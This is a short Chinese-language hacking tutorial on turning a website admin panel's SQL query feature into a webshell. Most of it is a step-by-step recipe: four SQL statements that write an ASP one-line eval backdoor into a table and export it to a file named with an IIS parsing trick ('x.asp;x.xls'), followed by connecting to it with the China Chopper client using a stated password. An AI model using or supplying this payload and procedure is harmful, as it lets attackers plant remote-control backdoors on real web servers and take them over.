利用后台SQL查询语句拿webshell

今天，朋友给了一个比较好玩的后台

有SQL查询功能

在后台的主页，或者备份什么的，可以得到网站的物理路径，这里我没有传马

直接点击了备份数据库，重点是得到物理路径，后台主页，或者各种爆物理路径

还要看运气和自由发挥了

以下拿webshell步骤

第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('<%eval request("123")%>')

第三句代码

select * into [a] in 'd:\wwwroot\wjqcad\admin163\Databackup\x.asp;x.xls' 'excel 4.0;' from cmd

第四句代码

drop table cmd

直接菜刀里连接http://www.xxxxx.com/x.asp;x.xls一句话  密码是123